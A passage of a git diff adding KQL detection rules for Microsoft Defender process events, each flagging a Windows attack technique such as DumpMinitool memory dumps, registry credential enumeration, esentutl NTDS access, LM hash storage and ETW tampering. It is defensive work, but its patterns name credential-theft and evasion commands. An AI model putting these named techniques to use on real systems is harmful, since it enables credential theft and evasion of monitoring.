+DeviceProcessEvents
+| where (ProcessCommandLine contains "0x0110" or ProcessCommandLine contains "0x01100:40") and FolderPath endswith "\\sqldumper.exe"
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/dumpminitool_execution.kql b/KQL/rules/windows/process_creation/dumpminitool_execution.kql
new file mode 100644
index 00000000..c2ec9934
--- /dev/null
+++ b/KQL/rules/windows/process_creation/dumpminitool_execution.kql
@@ -0,0 +1,10 @@
+// Title: DumpMinitool Execution
+// Author: Nasreddine Bencherchali (Nextron Systems), Florian Roth (Nextron Systems)
+// Date: 2022-04-06
+// Level: medium
+// Description: Detects the use of "DumpMinitool.exe" a tool that allows the dump of process memory via the use of the "MiniDumpWriteDump"
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1036, attack.t1003.001, attack.credential-access
+
+DeviceProcessEvents
+| where (ProcessCommandLine contains " Full" or ProcessCommandLine contains " Mini" or ProcessCommandLine contains " WithHeap") and ((FolderPath endswith "\\DumpMinitool.exe" or FolderPath endswith "\\DumpMinitool.x86.exe" or FolderPath endswith "\\DumpMinitool.arm64.exe") or (ProcessVersionInfoOriginalFileName in~ ("DumpMinitool.exe", "DumpMinitool.x86.exe", "DumpMinitool.arm64.exe")))
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/dumpstack_log_defender_evasion.kql b/KQL/rules/windows/process_creation/dumpstack_log_defender_evasion.kql
new file mode 100644
index 00000000..48ec75ef
--- /dev/null
+++ b/KQL/rules/windows/process_creation/dumpstack_log_defender_evasion.kql
@@ -0,0 +1,10 @@
+// Title: DumpStack.log Defender Evasion
+// Author: Florian Roth (Nextron Systems)
+// Date: 2022-01-06
+// Level: critical
+// Description: Detects the use of the filename DumpStack.log to evade Microsoft Defender
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion
+
+DeviceProcessEvents
+| where FolderPath endswith "\\DumpStack.log" or ProcessCommandLine contains " -o DumpStack.log"
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/dynamic_net_compilation_via_csc_exe.kql b/KQL/rules/windows/process_creation/dynamic_net_compilation_via_csc_exe.kql
new file mode 100644
index 00000000..7e212732
--- /dev/null
+++ b/KQL/rules/windows/process_creation/dynamic_net_compilation_via_csc_exe.kql
@@ -0,0 +1,14 @@
+// Title: Dynamic .NET Compilation Via Csc.EXE
+// Author: Florian Roth (Nextron Systems), X__Junior (Nextron Systems)
+// Date: 2019-08-24
+// Level: medium
+// Description: Detects execution of "csc.exe" to compile .NET code. Attackers often leverage this to compile code on the fly and use it in other stages.
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1027.004
+// False Positives:
+//   - Legitimate software from program files - https://twitter.com/gN3mes1s/status/1206874118282448897
+//   - Legitimate Microsoft software - https://twitter.com/gabriele_pippi/status/1206907900268072962
+//   - Ansible
+
+DeviceProcessEvents
+| where FolderPath endswith "\\csc.exe" and ((ProcessCommandLine contains ":\\Perflogs\\" or ProcessCommandLine contains ":\\Users\\Public\\" or ProcessCommandLine contains "\\AppData\\Local\\Temp\\" or ProcessCommandLine contains "\\Temporary Internet" or ProcessCommandLine contains "\\Windows\\Temp\\") or ((ProcessCommandLine contains ":\\Users\\" and ProcessCommandLine contains "\\Favorites\\") or (ProcessCommandLine contains ":\\Users\\" and ProcessCommandLine contains "\\Favourites\\") or (ProcessCommandLine contains ":\\Users\\" and ProcessCommandLine contains "\\Contacts\\") or (ProcessCommandLine contains ":\\Users\\" and ProcessCommandLine contains "\\Pictures\\")) or ProcessCommandLine matches regex "([Pp]rogram[Dd]ata|%([Ll]ocal)?[Aa]pp[Dd]ata%|\\\\[Aa]pp[Dd]ata\\\\([Ll]ocal([Ll]ow)?|[Rr]oaming))\\\\[^\\\\]{1,256}$") and (not(((InitiatingProcessFolderPath startswith "C:\\Program Files (x86)\\" or InitiatingProcessFolderPath startswith "C:\\Program Files\\") or InitiatingProcessFolderPath =~ "C:\\Windows\\System32\\sdiagnhost.exe" or InitiatingProcessFolderPath =~ "C:\\Windows\\System32\\inetsrv\\w3wp.exe"))) and (not(((InitiatingProcessCommandLine contains "JwB7ACIAZgBhAGkAbABlAGQAIgA6AHQAcgB1AGUALAAiAG0AcwBnACIAOgAiAEEAbgBzAGkAYgBsAGUAIAByAGUAcQB1AGkAcgBlAHMAIABQAG8AdwBlAHIAUwBoAGUAbABsACAAdgAzAC4AMAAgAG8AcgAgAG4AZQB3AGUAcgAiAH0AJw" or InitiatingProcessCommandLine contains "cAewAiAGYAYQBpAGwAZQBkACIAOgB0AHIAdQBlACwAIgBtAHMAZwAiADoAIgBBAG4AcwBpAGIAbABlACAAcgBlAHEAdQBpAHIAZQBzACAAUABvAHcAZQByAFMAaABlAGwAbAAgAHYAMwAuADAAIABvAHIAIABuAGUAdwBlAHIAIgB9ACcA" or InitiatingProcessCommandLine contains "nAHsAIgBmAGEAaQBsAGUAZAAiADoAdAByAHUAZQAsACIAbQBzAGcAIgA6ACIAQQBuAHMAaQBiAGwAZQAgAHIAZQBxAHUAaQByAGUAcwAgAFAAbwB3AGUAcgBTAGgAZQBsAGwAIAB2ADMALgAwACAAbwByACAAbgBlAHcAZQByACIAfQAnA") or (InitiatingProcessFolderPath in~ ("C:\\ProgramData\\chocolatey\\choco.exe", "C:\\ProgramData\\chocolatey\\tools\\shimgen.exe")) or InitiatingProcessCommandLine contains "\\ProgramData\\Microsoft\\Windows Defender Advanced Threat Protection")))
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/email_exifiltration_via_powershell.kql b/KQL/rules/windows/process_creation/email_exifiltration_via_powershell.kql
new file mode 100644
index 00000000..5a0a00a1
--- /dev/null
+++ b/KQL/rules/windows/process_creation/email_exifiltration_via_powershell.kql
@@ -0,0 +1,10 @@
+// Title: Email Exifiltration Via Powershell
+// Author: Nasreddine Bencherchali (Nextron Systems),  Azure-Sentinel (idea)
+// Date: 2022-09-09
+// Level: high
+// Description: Detects email exfiltration via powershell cmdlets
+// MITRE Tactic: Exfiltration
+// Tags: attack.exfiltration
+
+DeviceProcessEvents
+| where (ProcessCommandLine contains "Add-PSSnapin" and ProcessCommandLine contains "Get-Recipient" and ProcessCommandLine contains "-ExpandProperty" and ProcessCommandLine contains "EmailAddresses" and ProcessCommandLine contains "SmtpAddress" and ProcessCommandLine contains "-hidetableheaders") and (FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\pwsh.exe")
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/enable_lm_hash_storage_proccreation.kql b/KQL/rules/windows/process_creation/enable_lm_hash_storage_proccreation.kql
new file mode 100644
index 00000000..bbd19baf
--- /dev/null
+++ b/KQL/rules/windows/process_creation/enable_lm_hash_storage_proccreation.kql
@@ -0,0 +1,11 @@
+// Title: Enable LM Hash Storage - ProcCreation
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2023-12-15
+// Level: high
+// Description: Detects changes to the "NoLMHash" registry value in order to allow Windows to store LM Hashes.
+// By setting this registry value to "0" (DWORD), Windows will be allowed to store a LAN manager hash of your password in Active Directory and local SAM databases.
+// MITRE Tactic: Persistence
+// Tags: attack.persistence, attack.defense-evasion, attack.t1112
+
+DeviceProcessEvents
+| where ProcessCommandLine contains "\\System\\CurrentControlSet\\Control\\Lsa" and ProcessCommandLine contains "NoLMHash" and ProcessCommandLine contains " 0"
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/enumerate_all_information_with_whoami_exe.kql b/KQL/rules/windows/process_creation/enumerate_all_information_with_whoami_exe.kql
new file mode 100644
index 00000000..f9ae9080
--- /dev/null
+++ b/KQL/rules/windows/process_creation/enumerate_all_information_with_whoami_exe.kql
@@ -0,0 +1,10 @@
+// Title: Enumerate All Information With Whoami.EXE
+// Author: Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)
+// Date: 2023-12-04
+// Level: medium
+// Description: Detects the execution of "whoami.exe" with the "/all" flag
+// MITRE Tactic: Discovery
+// Tags: attack.discovery, attack.t1033, car.2016-03-001
+
+DeviceProcessEvents
+| where (ProcessCommandLine contains " -all" or ProcessCommandLine contains " /all" or ProcessCommandLine contains " –all" or ProcessCommandLine contains " —all" or ProcessCommandLine contains " ―all") and (FolderPath endswith "\\whoami.exe" or ProcessVersionInfoOriginalFileName =~ "whoami.exe")
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/enumeration_for_3rd_party_creds_from_cli.kql b/KQL/rules/windows/process_creation/enumeration_for_3rd_party_creds_from_cli.kql
new file mode 100644
index 00000000..35b453b9
--- /dev/null
+++ b/KQL/rules/windows/process_creation/enumeration_for_3rd_party_creds_from_cli.kql
@@ -0,0 +1,10 @@
+// Title: Enumeration for 3rd Party Creds From CLI
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2022-06-20
+// Level: medium
+// Description: Detects processes that query known 3rd party registry keys that holds credentials via commandline
+// MITRE Tactic: Credential Access
+// Tags: attack.credential-access, attack.t1552.002
+
+DeviceProcessEvents
+| where (ProcessCommandLine contains "\\Software\\Aerofox\\Foxmail\\V3.1" or ProcessCommandLine contains "\\Software\\Aerofox\\FoxmailPreview" or ProcessCommandLine contains "\\Software\\DownloadManager\\Passwords" or ProcessCommandLine contains "\\Software\\FTPWare\\COREFTP\\Sites" or ProcessCommandLine contains "\\Software\\IncrediMail\\Identities" or ProcessCommandLine contains "\\Software\\Martin Prikryl\\WinSCP 2\\Sessions" or ProcessCommandLine contains "\\Software\\Mobatek\\MobaXterm\\" or ProcessCommandLine contains "\\Software\\OpenSSH\\Agent\\Keys" or ProcessCommandLine contains "\\Software\\OpenVPN-GUI\\configs" or ProcessCommandLine contains "\\Software\\ORL\\WinVNC3\\Password" or ProcessCommandLine contains "\\Software\\Qualcomm\\Eudora\\CommandLine" or ProcessCommandLine contains "\\Software\\RealVNC\\WinVNC4" or ProcessCommandLine contains "\\Software\\RimArts\\B2\\Settings" or ProcessCommandLine contains "\\Software\\SimonTatham\\PuTTY\\Sessions" or ProcessCommandLine contains "\\Software\\SimonTatham\\PuTTY\\SshHostKeys\\" or ProcessCommandLine contains "\\Software\\Sota\\FFFTP" or ProcessCommandLine contains "\\Software\\TightVNC\\Server" or ProcessCommandLine contains "\\Software\\WOW6432Node\\Radmin\\v3.0\\Server\\Parameters\\Radmin") and (not(((ProcessCommandLine contains "export" or ProcessCommandLine contains "save") and FolderPath endswith "reg.exe")))
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/enumeration_for_credentials_in_registry.kql b/KQL/rules/windows/process_creation/enumeration_for_credentials_in_registry.kql
new file mode 100644
index 00000000..50aa7bd6
--- /dev/null
+++ b/KQL/rules/windows/process_creation/enumeration_for_credentials_in_registry.kql
@@ -0,0 +1,12 @@
+// Title: Enumeration for Credentials in Registry
+// Author: frack113
+// Date: 2021-12-20
+// Level: medium
+// Description: Adversaries may search the Registry on compromised systems for insecurely stored credentials.
+// The Windows Registry stores configuration information that can be used by the system or other programs.
+// Adversaries may query the Registry looking for credentials and passwords that have been stored for use by other programs or services
+// MITRE Tactic: Credential Access
+// Tags: attack.credential-access, attack.t1552.002
+
+DeviceProcessEvents
+| where ((ProcessCommandLine contains " query " and ProcessCommandLine contains "/t " and ProcessCommandLine contains "REG_SZ" and ProcessCommandLine contains "/s") and FolderPath endswith "\\reg.exe") and ((ProcessCommandLine contains "/f " and ProcessCommandLine contains "HKLM") or (ProcessCommandLine contains "/f " and ProcessCommandLine contains "HKCU") or ProcessCommandLine contains "HKCU\\Software\\SimonTatham\\PuTTY\\Sessions")
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/esentutl_gather_credentials.kql b/KQL/rules/windows/process_creation/esentutl_gather_credentials.kql
new file mode 100644
index 00000000..109dcafe
--- /dev/null
+++ b/KQL/rules/windows/process_creation/esentutl_gather_credentials.kql
@@ -0,0 +1,12 @@
+// Title: Esentutl Gather Credentials
+// Author: sam0x90
+// Date: 2021-08-06
+// Level: medium
+// Description: Conti recommendation to its affiliates to use esentutl to access NTDS dumped file. Trickbot also uses this utilities to get MSEdge info via its module pwgrab.
+// MITRE Tactic: Credential Access
+// Tags: attack.credential-access, attack.t1003, attack.t1003.003, attack.s0404
+// False Positives:
+//   - To be determined
+
+DeviceProcessEvents
+| where ProcessCommandLine contains "esentutl" and ProcessCommandLine contains " /p"
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/esentutl_steals_browser_information.kql b/KQL/rules/windows/process_creation/esentutl_steals_browser_information.kql
new file mode 100644
index 00000000..6e265852
--- /dev/null
+++ b/KQL/rules/windows/process_creation/esentutl_steals_browser_information.kql
@@ -0,0 +1,12 @@
+// Title: Esentutl Steals Browser Information
+// Author: frack113
+// Date: 2022-02-13
+// Level: medium
+// Description: One way Qbot steals sensitive information is by extracting browser data from Internet Explorer and Microsoft Edge by using the built-in utility esentutl.exe
+// MITRE Tactic: Collection
+// Tags: attack.collection, attack.t1005
+// False Positives:
+//   - Legitimate use
+
+DeviceProcessEvents
+| where (ProcessCommandLine contains "-r" or ProcessCommandLine contains "/r" or ProcessCommandLine contains "–r" or ProcessCommandLine contains "—r" or ProcessCommandLine contains "―r") and (FolderPath endswith "\\esentutl.exe" or ProcessVersionInfoOriginalFileName =~ "esentutl.exe") and ProcessCommandLine contains "\\Windows\\WebCache"
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/etw_logging_tamper_in_net_processes_via_commandline.kql b/KQL/rules/windows/process_creation/etw_logging_tamper_in_net_processes_via_commandline.kql
new file mode 100644
index 00000000..046358e9
--- /dev/null
+++ b/KQL/rules/windows/process_creation/etw_logging_tamper_in_net_processes_via_commandline.kql
@@ -0,0 +1,13 @@
+// Title: ETW Logging Tamper In .NET Processes Via CommandLine
+// Author: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)
+// Date: 2020-05-02
+// Level: high
+// Description: Detects changes to environment variables related to ETW logging via the CommandLine.
+// This could indicate potential adversaries stopping ETW providers recording loaded .NET assemblies.
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1562
+// False Positives:
+//   - Unlikely
+
+DeviceProcessEvents
+| where ProcessCommandLine contains "COMPlus_ETWEnabled" or ProcessCommandLine contains "COMPlus_ETWFlags"
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/etw_trace_evasion_activity.kql b/KQL/rules/windows/process_creation/etw_trace_evasion_activity.kql
new file mode 100644
index 00000000..e50564d9
--- /dev/null
+++ b/KQL/rules/windows/process_creation/etw_trace_evasion_activity.kql
@@ -0,0 +1,10 @@
+// Title: ETW Trace Evasion Activity
+// Author: @neu5ron, Florian Roth (Nextron Systems), Jonhnathan Ribeiro, oscd.community
+// Date: 2019-03-22
+// Level: high
+// Description: Detects command line activity that tries to clear or disable any ETW trace log which could be a sign of logging evasion.
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1070, attack.t1562.006, car.2016-04-002
+
+DeviceProcessEvents
+| where (ProcessCommandLine contains "cl" and ProcessCommandLine contains "/Trace") or (ProcessCommandLine contains "clear-log" and ProcessCommandLine contains "/Trace") or (ProcessCommandLine contains "sl" and ProcessCommandLine contains "/e:false") or (ProcessCommandLine contains "set-log" and ProcessCommandLine contains "/e:false") or (ProcessCommandLine contains "logman" and ProcessCommandLine contains "update" and ProcessCommandLine contains "trace" and ProcessCommandLine contains "--p" and ProcessCommandLine contains "-ets") or ProcessCommandLine contains "Remove-EtwTraceProvider" or (ProcessCommandLine contains "Set-EtwTraceProvider" and ProcessCommandLine contains "0x11")
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/exchange_powershell_snap_ins_usage.kql b/KQL/rules/windows/process_creation/exchange_powershell_snap_ins_usage.kql
new file mode 100644
index 00000000..2d8999c7
--- /dev/null
+++ b/KQL/rules/windows/process_creation/exchange_powershell_snap_ins_usage.kql
@@ -0,0 +1,10 @@
+// Title: Exchange PowerShell Snap-Ins Usage
+// Author: FPT.EagleEye, Nasreddine Bencherchali (Nextron Systems)
+// Date: 2021-03-03
+// Level: high
+// Description: Detects adding and using Exchange PowerShell snap-ins to export mailbox data. As seen used by HAFNIUM and APT27
+// MITRE Tactic: Execution
+// Tags: attack.execution, attack.t1059.001, attack.collection, attack.t1114
+
+DeviceProcessEvents
+| where (ProcessCommandLine contains "Add-PSSnapin" and ((FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\pwsh.exe") or (ProcessVersionInfoOriginalFileName in~ ("PowerShell.EXE", "pwsh.dll"))) and (ProcessCommandLine contains "Microsoft.Exchange.Powershell.Snapin" or ProcessCommandLine contains "Microsoft.Exchange.Management.PowerShell.SnapIn")) and (not((ProcessCommandLine contains "$exserver=Get-ExchangeServer ([Environment]::MachineName) -ErrorVariable exerr 2> $null" and InitiatingProcessFolderPath =~ "C:\\Windows\\System32\\msiexec.exe")))
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/execute_code_with_pester_bat.kql b/KQL/rules/windows/process_creation/execute_code_with_pester_bat.kql
new file mode 100644
index 00000000..8f44355c
--- /dev/null
+++ b/KQL/rules/windows/process_creation/execute_code_with_pester_bat.kql
@@ -0,0 +1,12 @@
+// Title: Execute Code with Pester.bat
+// Author: Julia Fomina, oscd.community
+// Date: 2020-10-08
+// Level: medium
+// Description: Detects code execution via Pester.bat (Pester - Powershell Modulte for testing)
+// MITRE Tactic: Execution
+// Tags: attack.execution, attack.t1059.001, attack.defense-evasion, attack.t1216
+// False Positives:
+//   - Legitimate use of Pester for writing tests for Powershell scripts and modules
+
+DeviceProcessEvents
+| where ((ProcessCommandLine contains "Pester" and ProcessCommandLine contains "Get-Help") and (FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\pwsh.exe")) or (((ProcessCommandLine contains "pester" and ProcessCommandLine contains ";") and FolderPath endswith "\\cmd.exe") and (ProcessCommandLine contains "help" or ProcessCommandLine contains "?"))
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/execute_code_with_pester_bat_as_parent.kql b/KQL/rules/windows/process_creation/execute_code_with_pester_bat_as_parent.kql
new file mode 100644
index 00000000..3df968c6
--- /dev/null
+++ b/KQL/rules/windows/process_creation/execute_code_with_pester_bat_as_parent.kql
@@ -0,0 +1,12 @@
+// Title: Execute Code with Pester.bat as Parent
+// Author: frack113, Nasreddine Bencherchali
+// Date: 2022-08-20
+// Level: medium
+// Description: Detects code execution via Pester.bat (Pester - Powershell Modulte for testing)
+// MITRE Tactic: Execution
+// Tags: attack.execution, attack.t1059.001, attack.defense-evasion, attack.t1216
+// False Positives:
+//   - Legitimate use of Pester for writing tests for Powershell scripts and modules
+
+DeviceProcessEvents
+| where (InitiatingProcessCommandLine contains "{ Invoke-Pester -EnableExit ;" or InitiatingProcessCommandLine contains "{ Get-Help \"") and (InitiatingProcessCommandLine contains "\\WindowsPowerShell\\Modules\\Pester\\" and (InitiatingProcessFolderPath endswith "\\powershell.exe" or InitiatingProcessFolderPath endswith "\\pwsh.exe"))
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/execute_files_with_msdeploy_exe.kql b/KQL/rules/windows/process_creation/execute_files_with_msdeploy_exe.kql
new file mode 100644
index 00000000..b556e4c3
--- /dev/null
+++ b/KQL/rules/windows/process_creation/execute_files_with_msdeploy_exe.kql
@@ -0,0 +1,12 @@
+// Title: Execute Files with Msdeploy.exe
+// Author: Beyu Denis, oscd.community
+// Date: 2020-10-18
+// Level: medium
+// Description: Detects file execution using the msdeploy.exe lolbin
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1218
+// False Positives:
+//   - System administrator Usage
+
+DeviceProcessEvents
+| where (ProcessCommandLine contains "verb:sync" and ProcessCommandLine contains "-source:RunCommand" and ProcessCommandLine contains "-dest:runCommand") and FolderPath endswith "\\msdeploy.exe"
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/execute_from_alternate_data_streams.kql b/KQL/rules/windows/process_creation/execute_from_alternate_data_streams.kql
new file mode 100644
index 00000000..fd3ac9b2
--- /dev/null
+++ b/KQL/rules/windows/process_creation/execute_from_alternate_data_streams.kql
@@ -0,0 +1,10 @@
+// Title: Execute From Alternate Data Streams
+// Author: frack113
+// Date: 2021-09-01
+// Level: medium
+// Description: Detects execution from an Alternate Data Stream (ADS). Adversaries may use NTFS file attributes to hide their malicious data in order to evade detection
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1564.004
+
+DeviceProcessEvents
+| where ProcessCommandLine contains "txt:" and ((ProcessCommandLine contains "esentutl " and ProcessCommandLine contains " /y " and ProcessCommandLine contains " /d " and ProcessCommandLine contains " /o ") or (ProcessCommandLine contains "makecab " and ProcessCommandLine contains ".cab") or (ProcessCommandLine contains "reg " and ProcessCommandLine contains " export ") or (ProcessCommandLine contains "regedit " and ProcessCommandLine contains " /E ") or (ProcessCommandLine contains "type " and ProcessCommandLine contains " > "))
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/execute_pcwrun_exe_to_leverage_follina.kql b/KQL/rules/windows/process_creation/execute_pcwrun_exe_to_leverage_follina.kql
new file mode 100644
index 00000000..f1cd71f7
--- /dev/null
+++ b/KQL/rules/windows/process_creation/execute_pcwrun_exe_to_leverage_follina.kql
@@ -0,0 +1,12 @@
+// Title: Execute Pcwrun.EXE To Leverage Follina
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2022-06-13
+// Level: high
+// Description: Detects indirect command execution via Program Compatibility Assistant "pcwrun.exe" leveraging the follina (CVE-2022-30190) vulnerability
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1218, attack.execution
+// False Positives:
+//   - Unlikely
+
+DeviceProcessEvents
+| where ProcessCommandLine contains "../" and FolderPath endswith "\\pcwrun.exe"
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/execution_of_non_existing_file.kql b/KQL/rules/windows/process_creation/execution_of_non_existing_file.kql
new file mode 100644
index 00000000..1e12eb9f
--- /dev/null
+++ b/KQL/rules/windows/process_creation/execution_of_non_existing_file.kql
@@ -0,0 +1,10 @@
+// Title: Execution Of Non-Existing File
+// Author: Max Altgelt (Nextron Systems)
+// Date: 2021-12-09
+// Level: high
+// Description: Checks whether the image specified in a process creation event is not a full, absolute path (caused by process ghosting or other unorthodox methods to start a process)
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion
+
+DeviceProcessEvents
+| where (not(FolderPath contains "\\")) and (not((((FolderPath in~ ("System", "Registry", "MemCompression", "vmmem")) or (ProcessCommandLine in~ ("Registry", "MemCompression", "vmmem"))) or (FolderPath in~ ("-", "")) or isnull(FolderPath))))
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/execution_of_powershell_script_in_public_folder.kql b/KQL/rules/windows/process_creation/execution_of_powershell_script_in_public_folder.kql
new file mode 100644
index 00000000..06c1acc2
--- /dev/null
+++ b/KQL/rules/windows/process_creation/execution_of_powershell_script_in_public_folder.kql
@@ -0,0 +1,12 @@
+// Title: Execution of Powershell Script in Public Folder
+// Author: Max Altgelt (Nextron Systems)
+// Date: 2022-04-06
+// Level: high
+// Description: This rule detects execution of PowerShell scripts located in the "C:\Users\Public" folder
+// MITRE Tactic: Execution
+// Tags: attack.execution, attack.t1059.001
+// False Positives:
+//   - Unlikely
+
+DeviceProcessEvents
+| where (ProcessCommandLine contains "-f C:\\Users\\Public" or ProcessCommandLine contains "-f \"C:\\Users\\Public" or ProcessCommandLine contains "-f %Public%" or ProcessCommandLine contains "-fi C:\\Users\\Public" or ProcessCommandLine contains "-fi \"C:\\Users\\Public" or ProcessCommandLine contains "-fi %Public%" or ProcessCommandLine contains "-fil C:\\Users\\Public" or ProcessCommandLine contains "-fil \"C:\\Users\\Public" or ProcessCommandLine contains "-fil %Public%" or ProcessCommandLine contains "-file C:\\Users\\Public" or ProcessCommandLine contains "-file \"C:\\Users\\Public" or ProcessCommandLine contains "-file %Public%") and (FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\pwsh.exe")
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/execution_of_suspicious_file_type_extension.kql b/KQL/rules/windows/process_creation/execution_of_suspicious_file_type_extension.kql
new file mode 100644
index 00000000..0b080057
--- /dev/null
+++ b/KQL/rules/windows/process_creation/execution_of_suspicious_file_type_extension.kql
@@ -0,0 +1,11 @@
+// Title: Execution of Suspicious File Type Extension
+// Author: Max Altgelt (Nextron Systems)
+// Date: 2021-12-09
+// Level: medium
+// Description: Detects whether the image specified in a process creation event doesn't refer to an ".exe" (or other known executable extension) file. This can be caused by process ghosting or other unorthodox methods to start a process.
+// This rule might require some initial baselining to align with some third party tooling in the user environment.
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion
+
+DeviceProcessEvents
+| where (not((FolderPath endswith ".bin" or FolderPath endswith ".cgi" or FolderPath endswith ".com" or FolderPath endswith ".exe" or FolderPath endswith ".scr" or FolderPath endswith ".tmp"))) and (not((FolderPath contains ":\\$Extend\\$Deleted\\" or FolderPath contains ":\\Windows\\System32\\DriverStore\\FileRepository\\" or (FolderPath in~ ("-", "")) or (FolderPath in~ ("System", "Registry", "MemCompression", "vmmem")) or FolderPath contains ":\\Windows\\Installer\\MSI" or (FolderPath contains ":\\Config.Msi\\" and (FolderPath endswith ".rbf" or FolderPath endswith ".rbs")) or isnull(FolderPath) or (InitiatingProcessFolderPath contains ":\\Windows\\Temp\\" or FolderPath contains ":\\Windows\\Temp\\")))) and (not((InitiatingProcessFolderPath contains ":\\ProgramData\\Avira\\" or (FolderPath endswith "com.docker.service" and InitiatingProcessFolderPath =~ "C:\\Windows\\System32\\services.exe") or FolderPath contains ":\\Program Files\\Mozilla Firefox\\" or FolderPath endswith "\\LZMA_EXE" or (FolderPath endswith ":\\Program Files (x86)\\MyQ\\Server\\pcltool.dll" or FolderPath endswith ":\\Program Files\\MyQ\\Server\\pcltool.dll") or (FolderPath contains "NVIDIA\\NvBackend\\" and FolderPath endswith ".dat") or ((FolderPath contains ":\\Program Files (x86)\\WINPAKPRO\\" or FolderPath contains ":\\Program Files\\WINPAKPRO\\") and FolderPath endswith ".ngn") or (FolderPath contains "\\AppData\\Local\\Packages\\" and FolderPath contains "\\LocalState\\rootfs\\"))))
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/execution_via_stordiag_exe.kql b/KQL/rules/windows/process_creation/execution_via_stordiag_exe.kql
new file mode 100644
index 00000000..7ae58432
--- /dev/null
+++ b/KQL/rules/windows/process_creation/execution_via_stordiag_exe.kql
@@ -0,0 +1,12 @@
+// Title: Execution via stordiag.exe
+// Author: Austin Songer (@austinsonger)
+// Date: 2021-10-21
+// Level: high
+// Description: Detects the use of stordiag.exe to execute schtasks.exe systeminfo.exe and fltmc.exe
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1218
+// False Positives:
+//   - Legitimate usage of stordiag.exe.
+
+DeviceProcessEvents
+| where ((FolderPath endswith "\\schtasks.exe" or FolderPath endswith "\\systeminfo.exe" or FolderPath endswith "\\fltmc.exe") and InitiatingProcessFolderPath endswith "\\stordiag.exe") and (not((InitiatingProcessFolderPath startswith "c:\\windows\\system32\\" or InitiatingProcessFolderPath startswith "c:\\windows\\syswow64\\")))
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/execution_via_workfolders_exe.kql b/KQL/rules/windows/process_creation/execution_via_workfolders_exe.kql
new file mode 100644
index 00000000..969d8c96
--- /dev/null
+++ b/KQL/rules/windows/process_creation/execution_via_workfolders_exe.kql
@@ -0,0 +1,12 @@
+// Title: Execution via WorkFolders.exe
+// Author: Maxime Thiebaut (@0xThiebaut)
+// Date: 2021-10-21
+// Level: high
+// Description: Detects using WorkFolders.exe to execute an arbitrary control.exe
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1218
+// False Positives:
+//   - Legitimate usage of the uncommon Windows Work Folders feature.
+
+DeviceProcessEvents
+| where (FolderPath endswith "\\control.exe" and InitiatingProcessFolderPath endswith "\\WorkFolders.exe") and (not(FolderPath =~ "C:\\Windows\\System32\\control.exe"))
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/explorer_nouaccheck_flag.kql b/KQL/rules/windows/process_creation/explorer_nouaccheck_flag.kql
new file mode 100644
index 00000000..984523a4
--- /dev/null
+++ b/KQL/rules/windows/process_creation/explorer_nouaccheck_flag.kql
@@ -0,0 +1,13 @@
+// Title: Explorer NOUACCHECK Flag
+// Author: Florian Roth (Nextron Systems)
+// Date: 2022-02-23
+// Level: high
+// Description: Detects suspicious starts of explorer.exe that use the /NOUACCHECK flag that allows to run all sub processes of that newly started explorer.exe without any UAC checks
+// MITRE Tactic: Privilege Escalation
+// Tags: attack.privilege-escalation, attack.defense-evasion, attack.t1548.002
+// False Positives:
+//   - Domain Controller User Logon
+//   - Unknown how many legitimate software products use that method
+
+DeviceProcessEvents
+| where (ProcessCommandLine contains "/NOUACCHECK" and FolderPath endswith "\\explorer.exe") and (not((InitiatingProcessCommandLine =~ "C:\\Windows\\system32\\svchost.exe -k netsvcs -p -s Schedule" or InitiatingProcessFolderPath =~ "C:\\Windows\\System32\\svchost.exe")))
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/explorer_process_tree_break.kql b/KQL/rules/windows/process_creation/explorer_process_tree_break.kql
new file mode 100644
index 00000000..0312650f
--- /dev/null
+++ b/KQL/rules/windows/process_creation/explorer_process_tree_break.kql
@@ -0,0 +1,11 @@
+// Title: Explorer Process Tree Break
+// Author: Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems), @gott_cyber
+// Date: 2019-06-29
+// Level: medium
